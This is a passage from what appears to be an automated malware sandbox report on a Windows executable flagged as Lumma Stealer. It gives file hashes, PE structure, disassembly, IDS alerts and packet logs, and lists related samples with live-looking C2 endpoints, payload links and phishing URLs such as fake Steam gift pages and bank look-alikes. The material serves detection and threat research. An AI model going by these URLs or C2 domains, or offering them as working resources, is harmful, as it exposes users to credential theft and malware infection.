                                                                                                                                                        Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          188.114.96.3DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                          • touxzw.ir/sirr/five/fre.php
                                                                                                                                                          lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                          • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                                                                                                                          10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • www.airgame.store/ojib/
                                                                                                                                                          Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • www.cc101.pro/59fb/
                                                                                                                                                          octux.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • servicetelemetryserver.shop/api/index.php
                                                                                                                                                          bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • www.rtprajalojago.live/2uvi/
                                                                                                                                                          lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • www.serverplay.live/71nl/
                                                                                                                                                          sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • www.cc101.pro/0r21/
                                                                                                                                                          E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • paste.ee/d/VO2TX
                                                                                                                                                          QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                          • filetransfer.io/data-package/fOmsJ2bL/download

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254

                                                                                                                                                          ASNs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          https://fexegreuyauja-8124.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 172.67.75.166
                                                                                                                                                          https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 172.67.69.226
                                                                                                                                                          http://iglawfirm.com/services/antai-fr/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          https://www.iglawfirm.com/services/antai-fr/infospage.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.17.24.14
                                                                                                                                                          http://bancolombia-personas-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.74.152
                                                                                                                                                          http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.26.12.205
                                                                                                                                                          http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                          • 104.16.124.96
                                                                                                                                                          https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.18.31.19
                                                                                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          https://fexegreuyauja-8124.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 172.67.75.166
                                                                                                                                                          https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 172.67.69.226
                                                                                                                                                          http://iglawfirm.com/services/antai-fr/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          https://www.iglawfirm.com/services/antai-fr/infospage.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.17.24.14
                                                                                                                                                          http://bancolombia-personas-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 172.67.74.152
                                                                                                                                                          http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.26.12.205
                                                                                                                                                          http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                          • 104.16.124.96
                                                                                                                                                          https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.18.31.19
                                                                                                                                                          AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunityv.com/redeemwalletcode/gift/514590383Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 88.221.169.65
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          https://steamcommunityv.com/redeemwalletcode/gift/514590383Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 88.221.169.65

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          • 188.114.96.3

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          No created / dropped files found

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Entropy (8bit):1.243849203671813
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                                                          • InstallShield setup (43055/19) 0.43%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
                                                                                                                                                          File size:41'135'106 bytes
                                                                                                                                                          MD5:de577c633508c2bc5e7be2ad04bf34f3
                                                                                                                                                          SHA1:7a88fa2b07e7ef10de364579235e37d40be949ed
                                                                                                                                                          SHA256:84f11a69fc5ab994993203b7e262203b9a86e943a233a932f7230c98b86740f1
                                                                                                                                                          SHA512:77f508f86bec3d2581e7c779b1b07aef1997ad3086298ab8d953b27f29cc7972e08a2b6fdc40e0a6b22d37935b436d5b83c0e7508be998b38653f051e9c644ed
                                                                                                                                                          SSDEEP:49152:Rwqf9c1ikmTe48pTPFynKiOqya9W5KcR+s9fI8jU5+usWUgB+N:WqFMIe4nn6W5+uso
                                                                                                                                                          TLSH:C4973901FACB45F5E9471D3050A7A27F67316E098F24CB97EA507F2AF8B76911C3620A
                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........P...............$..V......0 ........J...@..........................pV.......T...@................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:7aecd68ccad86810

                                                                                                                                                          Static PE Info

                                                                                                                                                          General

                                                                                                                                                          Entrypoint:0x472030
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:6
                                                                                                                                                          OS Version Minor:1
                                                                                                                                                          File Version Major:6
                                                                                                                                                          File Version Minor:1
                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                          Import Hash:1aae8bf580c846f39c71c05898e57e88

                                                                                                                                                          Entrypoint Preview

                                                                                                                                                          Instruction
                                                                                                                                                          jmp 00007F1C647F8520h
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          sub esp, 28h
                                                                                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                                                                                          mov dword ptr [esp+10h], ebp
                                                                                                                                                          mov dword ptr [esp+14h], esi
                                                                                                                                                          mov dword ptr [esp+18h], edi
                                                                                                                                                          mov dword ptr [esp], eax
                                                                                                                                                          mov dword ptr [esp+04h], ecx
                                                                                                                                                          call 00007F1C647D4856h
                                                                                                                                                          mov eax, dword ptr [esp+08h]
                                                                                                                                                          mov edi, dword ptr [esp+18h]
                                                                                                                                                          mov esi, dword ptr [esp+14h]
                                                                                                                                                          mov ebp, dword ptr [esp+10h]
                                                                                                                                                          mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                          add esp, 28h
                                                                                                                                                          retn 0004h
                                                                                                                                                          ret
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          sub esp, 08h
                                                                                                                                                          mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                          mov edx, dword ptr [ecx]
                                                                                                                                                          mov eax, esp
                                                                                                                                                          mov dword ptr [edx+04h], eax
                                                                                                                                                          sub eax, 00010000h
                                                                                                                                                          mov dword ptr [edx], eax
                                                                                                                                                          add eax, 00000BA0h
                                                                                                                                                          mov dword ptr [edx+08h], eax
                                                                                                                                                          mov dword ptr [edx+0Ch], eax
                                                                                                                                                          lea edi, dword ptr [ecx+34h]
                                                                                                                                                          mov dword ptr [edx+18h], ecx
                                                                                                                                                          mov dword ptr [edi], edx
                                                                                                                                                          mov dword ptr [esp+04h], edi
                                                                                                                                                          call 00007F1C647FA974h
                                                                                                                                                          cld
                                                                                                                                                          call 00007F1C647F9A0Eh
                                                                                                                                                          call 00007F1C647F8649h
                                                                                                                                                          add esp, 08h
                                                                                                                                                          ret
                                                                                                                                                          jmp 00007F1C647FA820h
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          mov ebx, dword ptr [esp+04h]
                                                                                                                                                          mov ebp, esp
                                                                                                                                                          mov dword ptr fs:[00000034h], 00000000h
                                                                                                                                                          mov ecx, dword ptr [ebx+04h]
                                                                                                                                                          cmp ecx, 00000000h
                                                                                                                                                          je 00007F1C647FA821h
                                                                                                                                                          mov eax, ecx
                                                                                                                                                          shl eax, 02h
                                                                                                                                                          sub esp, eax
                                                                                                                                                          mov edi, esp
                                                                                                                                                          mov esi, dword ptr [ebx+08h]
                                                                                                                                                          cld
                                                                                                                                                          rep movsd

                                                                                                                                                          Data Directories

                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5170000x44c.idata
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5370000x2f48c.rsrc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5180000x1da84.reloc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x4a9be00xb4.data
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                          Sections

                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                          .text0x10000x24d3080x24d400c4e1f723ae905cf4598ecb5dc4cff41bunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                          .rdata0x24f0000x2599680x259a00be6cf1db400ad1dd5e4c434643c98cfdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                          .data0x4a90000x6d9a00x4600039d7464b66d8b6ee1513a7fbe9afdfe7False0.3824986049107143data5.376735677069915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .idata0x5170000x44c0x600fe505a8139ebc7fcf214c5aea1da3a07False0.35546875OpenPGP Public Key3.804496625011791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .reloc0x5180000x1da840x1dc00de9e1b29314da97695a1ebb2353dd76fFalse0.5736935399159664data6.619261120076471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                          .symtab0x5360000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                          .rsrc0x5370000x2f48c0x2f600297a81611e0195edd5a09f4d673c1705False0.34936201352242746data4.644097258376503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                          Resources

                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                          RT_ICON0x5372b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3543 x 3543 px/m0.8031914893617021
                                                                                                                                                          RT_ICON0x5377180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3543 x 3543 px/m0.6565573770491804
                                                                                                                                                          RT_ICON0x5380a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3543 x 3543 px/m0.5377579737335835
                                                                                                                                                          RT_ICON0x5391480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3543 x 3543 px/m0.3990663900414938
                                                                                                                                                          RT_ICON0x53b6f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3543 x 3543 px/m0.3112305148795465
                                                                                                                                                          RT_ICON0x53f9180x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3543 x 3543 px/m0.28271719038817006
                                                                                                                                                          RT_ICON0x544da00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3543 x 3543 px/m0.21936094177002313
                                                                                                                                                          RT_ICON0x54e2480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3543 x 3543 px/m0.16890453093576246
                                                                                                                                                          RT_ICON0x55ea700x6c6aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9984506737767529
                                                                                                                                                          RT_GROUP_ICON0x5656dc0x84data0.7196969696969697
                                                                                                                                                          RT_VERSION0x5657600x584dataEnglishUnited States0.28541076487252126
                                                                                                                                                          RT_MANIFEST0x565ce40x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                                                                                                                                                          Imports

                                                                                                                                                          DLLImport
                                                                                                                                                          kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                                                          Possible Origin

                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                          EnglishUnited States

                                                                                                                                                          Network Behavior

                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                          2024-10-13T21:34:53.689769+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749707188.114.96.3443TCP
                                                                                                                                                          2024-10-13T21:34:53.689769+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749707188.114.96.3443TCP
                                                                                                                                                          2024-10-13T21:34:53.712514+02002055479ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)1192.168.2.7627541.1.1.153UDP
                                                                                                                                                          2024-10-13T21:34:53.724743+02002055483ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)1192.168.2.7622601.1.1.153UDP
                                                                                                                                                          2024-10-13T21:34:53.740374+02002055475ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop)1192.168.2.7636541.1.1.153UDP
                                                                                                                                                          2024-10-13T21:34:53.753153+02002055477ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop)1192.168.2.7557311.1.1.153UDP
                                                                                                                                                          2024-10-13T21:34:53.764790+02002055480ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop)1192.168.2.7496381.1.1.153UDP
                                                                                                                                                          2024-10-13T21:34:53.776070+02002055481ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop)1192.168.2.7546981.1.1.153UDP
                                                                                                                                                          2024-10-13T21:34:53.788496+02002055482ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop)1192.168.2.7649451.1.1.153UDP
                                                                                                                                                          2024-10-13T21:34:53.799618+02002055474ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop)1192.168.2.7525601.1.1.153UDP
                                                                                                                                                          2024-10-13T21:34:55.109408+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.749708104.102.49.254443TCP
                                                                                                                                                          2024-10-13T21:34:56.217981+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749709104.21.53.8443TCP
                                                                                                                                                          2024-10-13T21:34:56.217981+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749709104.21.53.8443TCP
                                                                                                                                                          2024-10-13T21:34:57.441465+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749712104.21.53.8443TCP
                                                                                                                                                          2024-10-13T21:34:57.441465+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749712104.21.53.8443TCP

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Oct 13, 2024 21:34:52.323033094 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:52.323069096 CEST44349707188.114.96.3192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:52.323129892 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:52.326288939 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:52.326304913 CEST44349707188.114.96.3192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:52.865120888 CEST44349707188.114.96.3192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:52.865225077 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:52.868465900 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:52.868478060 CEST44349707188.114.96.3192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:52.868793011 CEST44349707188.114.96.3192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:52.924778938 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:53.256957054 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:53.256994009 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:53.257291079 CEST44349707188.114.96.3192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.689843893 CEST44349707188.114.96.3192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.690107107 CEST44349707188.114.96.3192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.690335989 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:53.692754984 CEST49707443192.168.2.7188.114.96.3
                                                                                                                                                          Oct 13, 2024 21:34:53.692776918 CEST44349707188.114.96.3192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.822875023 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:53.822926998 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.823000908 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:53.823292017 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:53.823309898 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:54.537899017 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:54.538007975 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:54.540851116 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:54.540862083 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:54.541172028 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:54.542428970 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:54.587394953 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.109513044 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.109580040 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.109623909 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.109771013 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.109797001 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.109882116 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.236602068 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.236660004 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.236768961 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.236808062 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.236820936 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.236855030 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.244261026 CEST44349708104.102.49.254192.168.2.7
